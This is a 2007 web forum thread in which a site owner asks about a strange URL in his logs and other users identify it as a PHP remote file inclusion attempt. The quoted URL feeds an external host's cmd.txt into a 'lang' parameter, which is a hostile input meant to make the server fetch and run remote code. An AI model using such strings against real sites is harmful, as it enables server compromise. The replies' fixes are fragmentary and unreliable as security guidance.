1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

XSS (Cross Site Scripting) issue

Discussion in 'Security' started by komrad, Aug 15, 2007.

  1. #1
    Hello,
    SEMrush
    Some days ago, i checked my site visitor statistic and i was really wonder because there was many strange url found.

    Here are some of them:

    http://www.mydomain.com/order.php?lang=http://rpgnet.com/newrpgnet/intranet/cmd.txt

    Part of url in bold didnt exist in the site.

    So, could you give me solution about this problem? What should i do?
    Are they dangerous?

    I really need your help. Thanks in advance.
     
    komrad, Aug 15, 2007 IP
    SEMrush
  2. CodyRo

    CodyRo Peon

    Messages:
    365
    Likes Received:
    15
    Best Answers:
    0
    Trophy Points:
    0
    #2
    I suppose this forum makes a bit more sense than the Apache one.

    Check my post in the other forum.

    Linky
     
    CodyRo, Aug 16, 2007 IP
  3. Webmoney-Vl

    Webmoney-Vl Peon

    Messages:
    35
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #3
    It refers to not XSS, it PHP-inj. It is eliminated in the next way:

     
    Webmoney-Vl, Aug 16, 2007 IP
  4. BTS

    BTS Active Member

    Messages:
    184
    Likes Received:
    6
    Best Answers:
    0
    Trophy Points:
    58
    #4
    this is a remote file include
    if you use a script tell to his owner to cancel the bug
    like
    }else{
    echo " sorry , not found " ;
     
    BTS, Aug 21, 2007 IP